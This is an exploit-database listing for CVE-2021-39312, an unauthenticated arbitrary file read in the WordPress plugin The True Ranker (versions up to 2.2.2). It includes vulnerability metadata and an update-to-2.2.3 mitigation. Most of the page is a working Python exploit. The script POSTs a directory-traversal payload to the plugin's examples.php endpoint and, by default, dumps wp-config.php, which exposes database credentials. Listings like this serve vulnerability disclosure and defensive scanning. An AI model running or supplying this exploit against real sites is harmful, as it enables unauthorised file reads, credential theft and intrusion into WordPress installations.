header-logo
Suggest Exploit
vendor:
The True Ranker
by:
Nicole Sheinin, Liad Levy
8.8
CVSS
HIGH
Arbitrary File Read
22
CWE
Product Name: The True Ranker
Affected Version From: <= 2.2.2
Affected Version To: 2.2.2002
Patch Exists: YES
Related CWE: CVE-2021-39312
CPE: a:wordpress:wordpress:2.2.2
Metasploit:
Other Scripts:
Tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei References: https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.phphttps://nvd.nist.gov/vuln/detail/CVE-2021-39312
Nuclei Metadata: {'max-request': 1, 'framework': 'wordpress', 'vendor': 'trueranker', 'product': 'true_ranker'}
Platforms Tested: MacOS
2021

WordPress Plugin The True Ranker 2.2.2 – Arbitrary File Read (Unauthenticated)

The True Ranker plugin for WordPress is vulnerable to an unauthenticated arbitrary file read vulnerability. An attacker can send a specially crafted request to the vulnerable endpoint and read arbitrary files from the server.

Mitigation:

Update to version 2.2.3 or later.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
# Date: 23/12/2021
# Exploit Authors: Nicole Sheinin, Liad Levy
# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/
# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/
# Version: versions <= 2.2.2
# Tested on: MacOS 
# CVE: CVE-2021-39312
# Github repo: 

#!/usr/bin/env python3

import argparse, textwrap
import requests
import sys

parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)                     
group_must = parser.add_argument_group('must arguments')
group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) 
parser.add_argument("-p","--payload", help="Path to read  [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) 

args = parser.parse_args()

if len(sys.argv) <= 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")          
    sys.exit()  

HOST = args.url
PAYLOAD = args.payload

url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
payload = "/scripts/simple.php/{}".format(PAYLOAD)


r = requests.post(url,data={'src': payload})
if r.status_code == 200:
  print(r.text)
else:
  print("No exploit found")

Navigation

Suggest Exploit

Services By CQR